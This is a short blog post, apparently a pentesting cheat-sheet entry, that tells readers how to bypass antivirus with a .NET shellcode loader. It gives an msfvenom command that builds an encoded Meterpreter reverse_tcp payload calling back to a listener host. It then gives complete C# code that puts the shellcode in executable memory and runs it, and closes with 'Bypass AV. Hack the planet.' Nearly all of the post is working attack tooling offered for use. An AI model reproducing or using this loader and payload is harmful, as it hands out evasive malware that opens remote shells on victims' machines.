Bypass AV using .NET payload

super-spartan-race
If you haven’t already, add this to your cheat sheet for bypassing AV using a .NET payloaded via Visual Studio and msvenum. This was originally shared by .

Step 1: Download Visual Studio

Step 2:
Create payload via msvenum, using the following, cat the output.txt and copy the shellcode string:
———————————————————————-
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<listening host> LPORT=<listening port> EXITFUNC=thread -f raw -e x86/alpha_mixed BufferRegister=EAX > output.txt
———————————————————————-

Step 3:
Create new project and paste the following, but replace the string with the one you copied from output.txt:
——————————————————————–
using System;
using System.Runtime.InteropServices;
namespace Wrapper
{
class Program
{
[Flags]
public enum AllocationType : uint
{
COMMIT = 0x1000,
RESERVE = 0x2000,
RESET = 0x80000,
LARGE_PAGES = 0x20000000,
PHYSICAL = 0x400000,
TOP_DOWN = 0x100000,
WRITE_WATCH = 0x200000
}
[Flags]
public enum MemoryProtection : uint
{
EXECUTE = 0x10,
EXECUTE_READ = 0x20,
EXECUTE_READWRITE = 0x40,
EXECUTE_WRITECOPY = 0x80,
NOACCESS = 0x01,
READONLY = 0x02,
READWRITE = 0x04,
WRITECOPY = 0x08,
GUARD_Modifierflag = 0x100,
NOCACHE_Modifierflag = 0x200,
WRITECOMBINE_Modifierflag = 0x400
}
public enum FreeType : uint
{
MEM_DECOMMIT = 0x4000,
MEM_RELEASE = 0x8000
}
[DllImport(“kernel32.dll”, SetLastError = true)]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
[DllImport(“kernel32.dll”)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport(“kernel32”)]
private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, FreeType dwFreeType);
[UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)]
public delegate Int32 ExecuteDelegate();
static void Main()
{
// msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=<listener port> LHOST=<listener IP> R| msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
string shellcode = “PASTE THE STRING HERE“;
byte[] sc = new byte[shellcode.Length];
for (int i = 0; i < shellcode.Length; i++)
{
sc[i] = Convert.ToByte(shellcode[i]);
}
// Allocate RWX memory for the shellcode
IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, “Error: Couldn’t allocate remote memory”);
try
{
// Copy shellcode to RWX buffer
Marshal.Copy(sc, 0, baseAddr, sc.Length);
// Get pointer to function created in memory
ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));
del();
}
finally
{
VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE);
}
Console.ReadLine();
}
}
}

———————————————————————-
Step 4: Compile the project and fetch the newly encoded payload in the Visual Studio bin folder.

Step 5: Bypass AV. Hack the planet.